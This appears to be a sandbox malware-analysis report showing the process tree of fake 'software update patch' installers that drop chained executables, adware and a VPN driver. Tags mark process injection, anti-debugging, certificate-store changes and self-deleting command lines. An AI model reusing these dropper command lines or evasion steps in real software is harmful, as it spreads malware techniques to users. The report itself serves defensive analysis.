        "C:\Users\Admin\AppData\Roaming\3658051.exe"
          -
          C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - Executes dropped EXE
        -
        C:\Users\Admin\AppData\Roaming\4785864.exe
        "C:\Users\Admin\AppData\Roaming\4785864.exe"
        -
        C:\Users\Admin\AppData\Roaming\1873656.exe
        "C:\Users\Admin\AppData\Roaming\1873656.exe"
      -
      C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"
-
C:\Users\Admin\Desktop\Software-update-patc_535592163.exe
"C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
  -
  C:\Users\Admin\AppData\Local\Temp\is-TQ5KN.tmp\Software-update-patc_535592163.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-TQ5KN.tmp\Software-update-patc_535592163.tmp" /SL5="$70080,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
    -
    C:\Program Files (x86)\Ut\quam\Exercitationem.exe
    "C:\Program Files (x86)\Ut/\quam\Exercitationem.exe" 8208c5e16842608234b91821ef4b1c3f
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
      -
      C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe
      C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe /usthree SUB=8208c5e16842608234b91821ef4b1c3f
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
        -
        C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe
        C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe /usthree SUB=8208c5e16842608234b91821ef4b1c3f
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
          -
          C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im "UR1E1OJkSMSPSwU0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe" & exit
          - Suspicious use of WriteProcessMemory
            -
            C:\Windows\SysWOW64\taskkill.exe
            taskkill /im "UR1E1OJkSMSPSwU0.exe" /f
            - Kills process with taskkill
      -
      C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe
      C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe /VERYSILENT
      - Executes dropped EXE
      - Modifies system certificate store
      - Suspicious use of WriteProcessMemory
        -
        C:\Users\Admin\AppData\Local\Temp\Zembra.exe
        C:\Users\Admin\AppData\Local\Temp\Zembra.exe
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Identifies Wine through registry keys
        - Loads dropped DLL
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
          -
          C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im Zembra.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Zembra.exe" & del C:\ProgramData\*.dll & exit
            -
            C:\Windows\SysWOW64\taskkill.exe
            taskkill /im Zembra.exe /f
            - Kills process with taskkill
            -
            C:\Windows\SysWOW64\timeout.exe
            timeout /t 6
            - Delays execution with timeout.exe
        -
        C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
        C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
          -
          C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
          C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
          - Executes dropped EXE
        -
        C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe & exit
          -
          C:\Windows\SysWOW64\PING.EXE
          ping 0
          - Runs ping.exe
      -
      C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe
      C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f
      - Executes dropped EXE
      - Loads dropped DLL
      - Enumerates connected drives
      - Modifies system certificate store
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
        -
        C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634531721 /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f " AF="606x8208c5e16842608234b91821ef4b1c3f" AI_EXTEND_GLASS="26"
      -
      C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe
      C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe /silent /subid=510x8208c5e16842608234b91821ef4b1c3f
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
        -
        C:\Users\Admin\AppData\Local\Temp\is-GOVD6.tmp\vpn.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-GOVD6.tmp\vpn.tmp" /SL5="$40286,15170975,270336,C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe" /silent /subid=510x8208c5e16842608234b91821ef4b1c3f
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in Program Files directory
        - Modifies system certificate store
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory
          -
          C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
          - Suspicious use of WriteProcessMemory
            -
            C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
            tapinstall.exe remove tap0901
            - Executes dropped EXE
            - Checks SCSI registry key(s)
          -
          C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
          - Suspicious use of WriteProcessMemory
            -
            C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
            tapinstall.exe install OemVista.inf tap0901
            - Executes dropped EXE
            - Drops file in System32 directory
            - Drops file in Windows directory
            - Checks SCSI registry key(s)
            - Modifies system certificate store
          -
          C:\Program Files (x86)\MaskVPN\mask_svc.exe
          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
          - Executes dropped EXE
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious behavior: EnumeratesProcesses
          -
          C:\Program Files (x86)\MaskVPN\mask_svc.exe
          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
          - Executes dropped EXE
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
-
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
  -
  C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 6076792F8FAE51033604C8B6B14224A7 C
  - Loads dropped DLL
  -
  C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4BA0A3F9CC808604D8E09BC1EFBAF701
  - Blocklisted process makes network request
  - Loads dropped DLL
    -
    C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe
    Thu12912263469836d.exe
      -
      C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe
      C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe
  -
  C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
    -
    C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
    "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=606x8208c5e16842608234b91821ef4b1c3f -BF=default -uncf=default
      -
      C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--U4miRxC"
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ffdb6219ec0,0x7ffdb6219ed0,0x7ffdb6219ee0
          -
          C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
          C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x154,0x158,0x15c,0x130,0x160,0x7ff685704e60,0x7ff685704e70,0x7ff685704e80
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1772 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=2084 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2576 /prefetch:1
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3136 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3500 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3524 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1384 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3436 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1664 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1676 /prefetch:8
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2704 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2324 /prefetch:2
        -
        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3396 /prefetch:2
    -
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_25D5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8D0B1522903E88C526AC7B70E3FE81A1 C2⤵
-
C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-MPS5N.tmp\Software-update-patc_988440081.tmp"C:\Users\Admin\AppData\Local\Temp\is-MPS5N.tmp\Software-update-patc_988440081.tmp" /SL5="$3022E,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-JQGGL.tmp\Software-update-patc_988440081.tmp"C:\Users\Admin\AppData\Local\Temp\is-JQGGL.tmp\Software-update-patc_988440081.tmp" /SL5="$602B0,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{281517df-404b-4746-8814-625baa710267}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-EHPSJ.tmp\Software-update-patc_612604768.tmp"C:\Users\Admin\AppData\Local\Temp\is-EHPSJ.tmp\Software-update-patc_612604768.tmp" /SL5="$8005C,4477466,466944,C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Dolore\quia\Quibusdam.exe"C:\Program Files (x86)\Dolore/\quia\Quibusdam.exe" 2fe3d428284ff9b385bc1c941892777b3⤵
-
C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S8B23.tmp\Software-update-patc_612604768.tmp"C:\Users\Admin\AppData\Local\Temp\is-S8B23.tmp\Software-update-patc_612604768.tmp" /SL5="$B015A,4477466,466944,C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Dolore\quia\Quibusdam.exe"C:\Program Files (x86)\Dolore/\quia\Quibusdam.exe" 2fe3d428284ff9b385bc1c941892777b3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\NEzcHQw3\D1mhFu3.exeC:\Users\Admin\AppData\Local\Temp\NEzcHQw3\D1mhFu3.exe /qn CAMPAIGN="642"4⤵
-
C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exeC:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe /usthree SUB=2fe3d428284ff9b385bc1c941892777b4⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
-
